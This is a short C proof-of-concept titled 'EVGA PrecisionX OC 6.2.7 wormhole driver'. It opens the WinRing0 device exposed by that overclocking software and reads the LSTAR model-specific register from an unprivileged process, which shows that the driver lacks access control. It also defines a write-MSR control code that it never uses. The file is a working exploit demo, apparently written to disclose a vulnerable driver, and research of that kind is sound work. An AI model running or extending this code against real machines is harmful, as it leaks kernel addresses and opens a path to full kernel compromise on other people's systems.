EVGA PrecisionX OC 6.2.7 wormhole driver

wr0_demo2.c

#include <windows.h>
#include <cstdio>

#define DEVICE_WR0_TYPE 40000
#define WR0_DEVICE_LINK TEXT("\\\\.\\WinRing0_1_2_0")

HANDLE g_handleWR0 = INVALID_HANDLE_VALUE;

#define IOCTL_WR0_READ_MSR  CTL_CODE(DEVICE_WR0_TYPE, 0x821, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_WR0_WRITE_MSR	CTL_CODE(DEVICE_WR0_TYPE, 0x822, METHOD_BUFFERED, FILE_ANY_ACCESS)

BOOLEAN InitDriver()
{
    g_handleWR0 = CreateFile(WR0_DEVICE_LINK,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (g_handleWR0 == INVALID_HANDLE_VALUE) {
        printf_s("[!] Unable to open device\r\n");
        return FALSE;
    }
    return TRUE;
}

BOOL WINAPI ReadMSR(
    _In_ DWORD Msr,
    _In_ ULONGLONG* Value)
{
    DWORD bytesIO = 0;
    ULONGLONG valueRead = 0;

    if (DeviceIoControl(
        g_handleWR0,
        IOCTL_WR0_READ_MSR,
        &Msr,
        sizeof(Msr),
        &valueRead,
        sizeof(ULONGLONG),
        &bytesIO,
        NULL))
    {
        *Value = valueRead;
        return TRUE;
    }
    *Value = 0;
    return FALSE;
}

int Demo2()
{
    printf_s("EVGA PrecisionX OC 6.2.7 Non privileged MSR access demo\r\n"\
        "Read LSTAR MSR value\r\n");

    ULONGLONG msrValue = 0;
    
    if (ReadMSR(0xC0000082, &msrValue))
        printf("LSTAR value 0x%llX\r\n", msrValue);

    system("pause");

    CloseHandle(g_handleWR0);
    return 0;
}

int main()
{
    if (!InitDriver())
        return -1;

    return Demo2();
}